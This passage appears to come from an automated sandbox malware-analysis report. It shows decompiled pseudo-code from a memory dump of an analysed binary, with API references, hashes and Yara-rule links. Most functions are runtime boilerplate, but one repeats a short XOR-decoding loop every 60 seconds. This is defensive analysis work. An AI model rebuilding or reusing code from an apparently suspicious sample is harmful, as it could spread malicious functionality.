				WCHAR* _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				char _v28;
				char _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				char _v52;
				char _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				WCHAR* _v72;
				char _v76;
				void* _t43;
				void* _t54;
				WCHAR* _t55;
				void* _t56;
				WCHAR* _t60;

				_t56 = __ecx;
				_t55 = 0;
				_t60 = 0;
				_v76 = 0;
				_v72 = 0;
				_v68 = 0;
				_v64 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = E00E95F7B(_t56, _a4,  &_v76, E00E96E67(__eflags));
				_t66 = _t43;
				if(_t43 == 0 && E00E95F7B(_t56, _a8,  &_v52, E00E96E67(_t66)) == 0) {
					_t68 = _a32;
					if(_a32 == 0) {
						L5:
						_t55 = CreateProcessW(_v68, _v44, _a12, _a16, _a20, _a24, _a28, _t55, _a36, _a40);
					} else {
						_t54 = E00E95F7B(_t56, _a32,  &_v28, E00E96E67(_t68));
						_t60 = _v20;
						if(_t54 == 0) {
							_t55 = _t60;
							goto L5;
						}
					}
				}
				if(_v8 != 0) {
					E00E964B8(_t60);
				}
				if(_v32 != 0) {
					E00E964B8(_v44);
				}
				if(_v56 != 0) {
					E00E964B8(_v68);
				}
				return _t55;
			}

0x00ea1292
0x00ea129b
0x00ea129e
0x00ea12a0
0x00ea12a3
0x00ea12a6
0x00ea12a9
0x00ea12ac
0x00ea12af
0x00ea12b2
0x00ea12b5
0x00ea12b8
0x00ea12bb
0x00ea12be
0x00ea12c1
0x00ea12c4
0x00ea12c7
0x00ea12ca
0x00ea12cd
0x00ea12d0
0x00ea12d3
0x00ea12e3
0x00ea12eb
0x00ea12ed
0x00ea1308
0x00ea130b
0x00ea132b
0x00ea134d
0x00ea130d
0x00ea131a
0x00ea131f
0x00ea1327
0x00ea1329
0x00000000
0x00ea1329
0x00ea1327
0x00ea130b
0x00ea1353
0x00ea1356
0x00ea135b
0x00ea1360
0x00ea1365
0x00ea136a
0x00ea136f
0x00ea1374
0x00ea1379
0x00ea1381

APIs

CreateProcessW.KERNEL32 ref: 00EA1347
_free.LIBCMT ref: 00EA1356
_free.LIBCMT ref: 00EA1365
_free.LIBCMT ref: 00EA1374

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$CreateProcess
String ID:
API String ID: 1318292368-0
Opcode ID: 60054a868a824ec09b43e7e28aa7e47bd54c1e7b7d1cf74a1da4822ea67a6f2b
Instruction ID: d74beee00ba7ba730c76e6f45a9b5ccb51f71d684dd0f182d31b5c06a4dd28e9
Opcode Fuzzy Hash: 60054a868a824ec09b43e7e28aa7e47bd54c1e7b7d1cf74a1da4822ea67a6f2b
Instruction Fuzzy Hash: A83129B2C01208AFCF01AFA9DC819EEBFB9BF0D314F48506AF908B2211D7314954CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E99924, Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E99924(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E00E9A975(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(_t16 != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E00E9A975(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(_t17 != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E00E95B87(GetLastError());
									_t19 =  *((intOrPtr*)(E00E95BBD()));
								}
								L14:
								return _t19;
							}
							_t19 = E00E99EF0(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E00E95B87(GetLastError());
						return  *((intOrPtr*)(E00E95BBD()));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E00E99EF0(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E00E95F9A(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

0x00e9992b
0x00e99930
0x00e9994e
0x00e99950
0x00e99953
0x00e99980
0x00e99988
0x00e9998a
0x00e999a3
0x00e999a6
0x00e999a9
0x00e999b7
0x00e999c6
0x00e999ce
0x00e999d0
0x00e999e9
0x00e999ec
0x00e999ec
0x00e999d2
0x00e999d9
0x00e999e4
0x00e999e4
0x00e999ee
0x00000000
0x00e999ee
0x00e999ae
0x00e999b3
0x00e999b5
0x00000000
0x00000000
0x00000000
0x00e999b5
0x00e99993
0x00000000
0x00e9999e
0x00e99955
0x00e99958
0x00e9995b
0x00e9996e
0x00e99971
0x00e99944
0x00e99944
0x00000000
0x00e99947
0x00e99961
0x00e99966
0x00e99968
0x00e999f2
0x00e999f2
0x00000000
0x00e99968
0x00e99932
0x00e99937
0x00e9993c
0x00e9993e
0x00e99941
0x00000000

APIs

Part of subcall function 00E95F9A: _free.LIBCMT ref: 00E95FA8

Part of subcall function 00E9A975: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00E992F5,?,00000000,00000000), ref: 00E9AA17

GetLastError.KERNEL32 ref: 00E9998C
__dosmaperr.LIBCMT ref: 00E99993
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00E999D2
__dosmaperr.LIBCMT ref: 00E999D9

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 2beda98ef23d03950eb3f08bca13d838fa2017b4b00f5955078f57c3857e1b9c
Instruction ID: 8ec1f11f073c31f8722edb2b34b570c461fe0e1420c6163bdf35be1456b01fe9
Opcode Fuzzy Hash: 2beda98ef23d03950eb3f08bca13d838fa2017b4b00f5955078f57c3857e1b9c
Instruction Fuzzy Hash: E2212872204609BFDF10AFBA8C8196B77DDEF85368710911DF968B7242E730EC4087A0

Uniqueness

Uniqueness Score: -1.00%

Function 00E9830D, Relevance: 6.1, APIs: 4, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00E9830D(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0xea9310; // 0x7
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E00E9DBB7(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E00E998AF(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E00E9DBB7(__eflags,  *0xea9310, _t51);
							if(__eflags != 0) {
								E00E98137(_t60, _t51, 0xeaa8cc);
								E00E964B8(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E00E9DBB7(__eflags,  *0xea9310, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E00E9DBB7(0,  *0xea9310, 0);
							_push(0);
							L9:
							E00E964B8();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E00E9DB78(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0xea9310; // 0x7
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E00E95E69(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0xea9310; // 0x7
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E00E9DBB7(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E00E998AF(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E00E9DBB7(__eflags,  *0xea9310, _t60);
								if(__eflags != 0) {
									E00E98137(_t60, _t60, 0xeaa8cc);
									E00E964B8(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E00E9DBB7(__eflags,  *0xea9310, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E00E9DBB7(__eflags,  *0xea9310, _t20);
								_push(_t60);
								L25:
								E00E964B8();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E00E9DB78(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0xea9310; // 0x7
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E00E95E69(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0xea9310; // 0x7
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E00E9DBB7(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E00E998AF(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E00E9DBB7(__eflags,  *0xea9310, _t54);
											if(__eflags != 0) {
												E00E98137(_t61, _t54, 0xeaa8cc);
												E00E964B8(0);
												goto L45;
											} else {
												_t40 = 0;
												E00E9DBB7(__eflags,  *0xea9310, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E00E9DBB7(0,  *0xea9310, 0);
											_push(0);
											L41:
											E00E964B8();
											goto L36;
										}
									}
								} else {
									_t54 = E00E9DB78(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0xea9310; // 0x7
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x00e9830d
0x00e9830d
0x00e98318
0x00e9831a
0x00e9831f
0x00e98322
0x00e98340
0x00e98343
0x00e98348
0x00e9834a
0x00000000
0x00e9834c
0x00e98358
0x00e9835b
0x00e9835c
0x00e9835e
0x00e98383
0x00e98385
0x00e9839e
0x00e983a5
0x00e983aa
0x00000000
0x00e98387
0x00e98387
0x00e98390
0x00e98395
0x00000000
0x00e98395
0x00e98360
0x00e98360
0x00e98360
0x00e98369
0x00e9836e
0x00e9836f
0x00e9836f
0x00e98374
0x00000000
0x00e98374
0x00e9835e
0x00e98324
0x00e9832a
0x00e9832e
0x00e9833b
0x00000000
0x00e98330
0x00e98333
0x00e983ad
0x00e983ad
0x00e98335
0x00e98335
0x00e98335
0x00e98337
0x00e98337
0x00e98337
0x00e98333
0x00e9832e
0x00e983b0
0x00e983b8
0x00e983ba
0x00e983bc
0x00e983c4
0x00e983c9
0x00e983ca
0x00e983cf
0x00e983d0
0x00e983d3
0x00e983ed
0x00e983f0
0x00e983f5
0x00e983f7
0x00000000
0x00e983f9
0x00e98405
0x00e98408
0x00e98409
0x00e9840b
0x00e9842e
0x00e98430
0x00e98447
0x00e9844e
0x00e98453
0x00000000
0x00e98432
0x00e98439
0x00e9843e
0x00000000
0x00e9843e
0x00e9840d
0x00e98414
0x00e98419
0x00e9841a
0x00e9841a
0x00e9841f
0x00000000
0x00e9841f
0x00e9840b
0x00e983d5
0x00e983db
0x00e983dd
0x00e983df
0x00e983e8
0x00000000
0x00e983e1
0x00e983e1
0x00e983e4
0x00e9845e
0x00e9845e
0x00e98463
0x00e98466
0x00e98467
0x00e98468
0x00e9846f
0x00e98471
0x00e98476
0x00e98479
0x00e98497
0x00e9849a
0x00e9849f
0x00e984a1
0x00000000
0x00e984a3
0x00e984af
0x00e984b3
0x00e984b5
0x00e984da
0x00e984dc
0x00e984f5
0x00e984fc
0x00000000
0x00e984de
0x00e984de
0x00e984e7
0x00e984ec
0x00000000
0x00e984ec
0x00e984b7
0x00e984b7
0x00e984b7
0x00e984c0
0x00e984c5
0x00e984c6
0x00e984c6
0x00000000
0x00e984cb
0x00e984b5
0x00e9847b
0x00e98481
0x00e98483
0x00e98485
0x00e98492
0x00000000
0x00e98487
0x00e98487
0x00e9848a
0x00e98504
0x00e98504
0x00e9848c
0x00e9848c
0x00e9848c
0x00e9848c
0x00e9848e
0x00e9848e
0x00e9848e
0x00e9848a
0x00e98485
0x00e98507
0x00e9850f
0x00e98511
0x00e98511
0x00e98518
0x00e983e6
0x00e98456
0x00e98456
0x00e98458
0x00000000
0x00e9845a
0x00e9845d
0x00e9845d
0x00e98458
0x00e983e4
0x00e983df
0x00e983be
0x00e983c3
0x00e983c3

APIs

GetLastError.KERNEL32(00000000,00000001,00000004,00E91A0E,00000001,00000000,00000002,?,00E98F84,00000002,00000000,00000001,00000002), ref: 00E98312
_free.LIBCMT ref: 00E9836F
_free.LIBCMT ref: 00E983A5
SetLastError.KERNEL32(00000000,00000007,000000FF,?,00E98F84,00000002,00000000,00000001,00000002), ref: 00E983B0

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 8041e40fbfb26ff0ab316e73446ebb7db64797a854c3dedfff9dda08880aad7a
Instruction ID: c52b6fa9310129f06b47e046faef01f1a6b455e0a24ec80bc80ca212917bd876
Opcode Fuzzy Hash: 8041e40fbfb26ff0ab316e73446ebb7db64797a854c3dedfff9dda08880aad7a
Instruction Fuzzy Hash: 1111E9332046116FCF11B7759D85D3A26A9ABD7BB4B352635F930B61F2EE258C088120

Uniqueness

Uniqueness Score: -1.00%

Function 00E98464, Relevance: 6.1, APIs: 4, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00E98464() {
				void* __esi;
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t17;
				long _t20;

				_t20 = GetLastError();
				_t2 =  *0xea9310; // 0x7
				_t23 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E00E9DBB7(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t17 = E00E998AF(1, 0x364);
						__eflags = _t17;
						if(__eflags != 0) {
							__eflags = E00E9DBB7(__eflags,  *0xea9310, _t17);
							if(__eflags != 0) {
								E00E98137(_t20, _t17, 0xeaa8cc);
								E00E964B8(0);
								goto L13;
							} else {
								_t13 = 0;
								E00E9DBB7(__eflags,  *0xea9310, 0);
								_push(_t17);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E00E9DBB7(0,  *0xea9310, 0);
							_push(0);
							L9:
							E00E964B8();
							goto L4;
						}
					}
				} else {
					_t17 = E00E9DB78(_t23, _t2);
					if(_t17 == 0) {
						_t2 =  *0xea9310; // 0x7
						goto L6;
					} else {
						if(_t17 != 0xffffffff) {
							L13:
							_t13 = _t17;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t17 = _t13;
						}
					}
				}
				SetLastError(_t20);
				asm("sbb edi, edi");
				return  ~_t17 & _t13;
			}

0x00e9846f
0x00e98471
0x00e98476
0x00e98479
0x00e98497
0x00e9849a
0x00e9849f
0x00e984a1
0x00000000
0x00e984a3
0x00e984af
0x00e984b3
0x00e984b5
0x00e984da
0x00e984dc
0x00e984f5
0x00e984fc
0x00000000
0x00e984de
0x00e984de
0x00e984e7
0x00e984ec
0x00000000
0x00e984ec
0x00e984b7
0x00e984b7
0x00e984b7
0x00e984c0
0x00e984c5
0x00e984c6
0x00e984c6
0x00000000
0x00e984cb
0x00e984b5
0x00e9847b
0x00e98481
0x00e98485
0x00e98492
0x00000000
0x00e98487
0x00e9848a
0x00e98504
0x00e98504
0x00e9848c
0x00e9848c
0x00e9848c
0x00e9848e
0x00e9848e
0x00e9848e
0x00e9848a
0x00e98485
0x00e98507
0x00e9850f
0x00e98518

APIs

GetLastError.KERNEL32(?,00000000,00000002,00E95BC2,00E96F5F,00000000,?,00E9084B,00000002,?,?,?,00E824A9,00000000,0000002C,00E825BB), ref: 00E98469
_free.LIBCMT ref: 00E984C6
_free.LIBCMT ref: 00E984FC
SetLastError.KERNEL32(00000000,00000007,000000FF,?,00000000,00000002,00E95BC2,00E96F5F,00000000,?,00E9084B,00000002,?,?,?,00E824A9), ref: 00E98507

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 2a2ef5f7b5f7099b5801c7a65a106a4ee1be6b9aeeef2466952ebcd3a5200cfb
Instruction ID: d8d326389b877f1d6b9f07c5542c5865fe9a43882fa160ba50d8a74fbdaf1064
Opcode Fuzzy Hash: 2a2ef5f7b5f7099b5801c7a65a106a4ee1be6b9aeeef2466952ebcd3a5200cfb
Instruction Fuzzy Hash: 931148322043116ECF2027B59D81D7A26A9AFC7778B352634F534B31F2EE258C088120

Uniqueness

Uniqueness Score: -1.00%

Function 00E88F8B, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 56
sleepCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00E88F8B() {
				signed int _v8;
				char _v20;
				char _v23;
				short _v24;
				char _v28;
				intOrPtr _v32;
				signed int _t17;
				char _t22;
				void* _t27;
				void* _t29;
				void* _t31;
				intOrPtr* _t32;
				void* _t36;
				intOrPtr _t37;
				void* _t38;
				void* _t40;
				void* _t41;
				void* _t42;
				signed int _t43;
				signed int _t45;

				_t45 = (_t43 & 0xfffffff8) - 0x1c;
				_t17 =  *0xea9014; // 0xa413846
				_v8 = _t17 ^ _t45;
				while(1) {
					_push(0x104);
					_t40 = E00E909A2();
					_v28 = 0x242c2830;
					_v24 = 0x38;
					_t31 = 0;
					goto L2;
					do {
						L4:
						_t22 =  *_t32;
						 *((char*)(_t36 + _t32)) = _t22;
						_t32 = _t32 + 1;
					} while (_t22 != 0);
					_t33 = _t40;
					_t41 = E00E897E3(_t29, _t40, _t38, _t40, _t42);
					_t51 = _t41;
					if(_t41 != 0) {
						E00E88E00(_t29, _t38, _t41, _t51);
						E00E8AB00(_t41,  &_v20, 0xe7da3c);
						if(_v32 != 0 &&  *((intOrPtr*)(_t45 + 0x14)) != 0) {
							_t27 = E00E925D7(_t33, _v20, 0, 0xa);
							_t37 =  *((intOrPtr*)(_t45 + 0x20));
							_t45 = _t45 + 0xc;
							E00E88CE5(_t29, _t27, _t37, _t38, _t41);
						}
					}
					Sleep(0xea60);
					continue;
					L2:
					_t4 = _t31 + 0x40; // 0x40
					 *(_t45 + _t31 + 8) =  *(_t45 + _t31 + 8) ^ _t4;
					_t31 = _t31 + 1;
					if(_t31 < 5) {
						goto L2;
					} else {
						_t9 =  &_v28; // 0x242c2830
						_t32 = _t9;
						_v23 = 0;
						_t36 = _t40 - _t32;
						goto L4;
					}
				}
			}

0x00e88f91
0x00e88f94
0x00e88f9b
0x00e88fa0
0x00e88fa0
0x00e88fab
0x00e88fad
0x00e88fb5
0x00e88fbc
0x00e88fbc
0x00e88fda
0x00e88fda
0x00e88fda
0x00e88fdc
0x00e88fdf
0x00e88fe0
0x00e88fe4
0x00e88feb
0x00e88fed
0x00e88fef
0x00e88ff1
0x00e89001
0x00e8900b
0x00e8901c
0x00e89021
0x00e89025
0x00e8902a
0x00e8902a
0x00e8900b
0x00e89034
0x00000000
0x00e88fbe
0x00e88fbe
0x00e88fc1
0x00e88fc5
0x00e88fc9
0x00000000
0x00e88fcb
0x00e88fcb
0x00e88fcb
0x00e88fcf
0x00e88fd8
0x00000000
0x00e88fd8
0x00e88fc9

APIs

Sleep.KERNEL32(0000EA60), ref: 00E89034

Strings

F8A/, xrefs: 00E88F94
8, xrefs: 00E88FB5
0(,$, xrefs: 00E88FCB

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: Sleep
String ID: 0(,$$8$F8A/
API String ID: 3472027048-1628971314
Opcode ID: ebd919cb3bcf082aa6fa68f5568d8b6bc5275134dd5dde0fbab4a4b7ffda4c44
Instruction ID: 3b6fbe65368ec3c5fe4a061eefa65257512ae3f1b5a181255237a82958453020
Opcode Fuzzy Hash: ebd919cb3bcf082aa6fa68f5568d8b6bc5275134dd5dde0fbab4a4b7ffda4c44
Instruction Fuzzy Hash: 49115330A083408FC326BB38C90571A7BD0AF85744F58452CFA8DBA293DA30C948C7A3

Uniqueness

Uniqueness Score: -1.00%

Function 00E8766E, Relevance: 6.1, APIs: 4, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00E8766E(void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v12;
				char _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t72;
				char _t83;
				intOrPtr _t85;
				char _t86;
				intOrPtr _t88;
				void* _t93;
				intOrPtr _t95;
				intOrPtr _t100;
				void* _t103;
				intOrPtr _t104;
				void* _t107;
				char _t112;
				char _t113;
				intOrPtr* _t120;
				intOrPtr* _t121;
				intOrPtr _t122;
				intOrPtr _t124;
				signed int _t126;
				intOrPtr _t137;
				signed int _t139;
				signed int _t143;
				intOrPtr* _t145;

				E00E8B97D( &_v12, 0);
				_t139 =  *0xeaae84; // 0x0
				_v8 = _t139;
				_t72 = E00E83598(0xeaa178);
				_t116 = _a4;
				_t143 = E00E83612(_a4, _t72);
				if(_t143 != 0) {
					L5:
					E00E8B9D5( &_v12);
					return _t143;
				} else {
					if(_t139 == 0) {
						__eflags = E00E8367F(__ebx, _t116, __edx,  &_v8, _a4) - 0xffffffff;
						if(__eflags == 0) {
							_t120 =  &_v24;
							E00E8345D(_t120);
							E00E8D24A( &_v24, 0xea6510);
							asm("int3");
							_push(0x2c);
							E00EA4BBE();
							_v44 = __edx;
							_t145 = _t120;
							_v36 = _t145;
							__eflags = 0;
							_v28 = 0;
							_t121 = __edx;
							_t137 = __edx + 1;
							do {
								_t83 =  *_t121;
								_t121 = _t121 + 1;
								__eflags = _t83;
							} while (_t83 != 0);
							_t122 = _t121 - _t137;
							_v32 = _t122;
							_t85 =  *((intOrPtr*)( *_t145 + 4));
							_t112 =  *((intOrPtr*)(_t85 + _t145 + 0x20));
							_t86 =  *((intOrPtr*)(_t85 + _t145 + 0x24));
							__eflags = _t86;
							if(__eflags < 0) {
								L16:
								asm("xorps xmm0, xmm0");
								asm("movlpd [ebp-0x30], xmm0");
								_t86 = _v48;
								_t113 = _v52;
							} else {
								if(__eflags > 0) {
									L15:
									_t113 = _t112 - _t122;
									asm("sbb eax, edi");
								} else {
									__eflags = _t112;
									if(_t112 <= 0) {
										goto L16;
									} else {
										__eflags = _t86;
										if(__eflags < 0) {
											goto L16;
										} else {
											if(__eflags > 0) {
												goto L15;
											} else {
												__eflags = _t112 - _t122;
												if(_t112 <= _t122) {
													goto L16;
												} else {
													goto L15;
												}
											}
										}
									}
								}
							}
							_v24 = _t86;
							E00E87B12( &_v60, _t145);
							__eflags = _v56;
							if(_v56 != 0) {
								_v8 = 0;
								_t124 =  *_t145;
								_t88 =  *((intOrPtr*)(_t124 + 4));
								__eflags = ( *(_t88 + _t145 + 0x14) & 0x000001c0) - 0x40;
								if(( *(_t88 + _t145 + 0x14) & 0x000001c0) == 0x40) {
									L27:
									_t93 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t124 + 4)) + _t145 + 0x38)))) + 0x24))(_v44, _v32, 0);
									__eflags = _t93 - _v32;
									if(_t93 != _v32) {
										goto L34;
									} else {
										__eflags = _t137;
										if(_t137 != 0) {
											goto L34;
										} else {
											_t100 = _v24;
											while(1) {
												__eflags = _t100;
												if(__eflags < 0) {
													break;
												}
												if(__eflags > 0) {
													L33:
													_v44 =  *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4)) + _t145 + 0x40));
													_t103 = E00E87BAB( *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4)) + _t145 + 0x38)), _v44);
													__eflags = _t103 - 0xffffffff;
													if(_t103 != 0xffffffff) {
														_t113 = _t113 + 0xffffffff;
														_v52 = _t113;
														_t100 = _v24;
														asm("adc eax, 0xffffffff");
														_v24 = _t100;
														_v48 = _t100;
														continue;
													} else {
														goto L34;
													}
												} else {
													__eflags = _t113;
													if(_t113 <= 0) {
														break;
													} else {
														goto L33;
													}
												}
												goto L37;
											}
											_t126 = 0;
										}
									}
								} else {
									_t104 = _v24;
									while(1) {
										__eflags = _t104;
										if(__eflags < 0) {
											break;
										}
										if(__eflags > 0) {
											L24:
											_v40 =  *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4)) + _t145 + 0x40));
											_t107 = E00E87BAB( *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4)) + _t145 + 0x38)), _v40);
											__eflags = _t107 - 0xffffffff;
											if(_t107 == 0xffffffff) {
												L34:
												_t126 = 4;
												_v28 = _t126;
											} else {
												_t113 = _t113 + 0xffffffff;
												_v52 = _t113;
												_t104 = _v24;
												asm("adc eax, 0xffffffff");
												_v24 = _t104;
												_v48 = _t104;
												continue;
											}
										} else {
											__eflags = _t113;
											if(_t113 <= 0) {
												break;
											} else {
												goto L24;
											}
										}
										goto L37;
									}
									_t124 =  *_t145;
									goto L27;
								}
								L37:
								_t95 =  *((intOrPtr*)( *_t145 + 4));
								 *((intOrPtr*)(_t95 + _t145 + 0x20)) = 0;
								 *((intOrPtr*)(_t95 + _t145 + 0x24)) = 0;
								_v8 = _v8 | 0xffffffff;
							} else {
								_t126 = 4;
							}
							__eflags =  *((intOrPtr*)( *_t145 + 4)) + _t145;
							E00E8759B(_t126, 0);
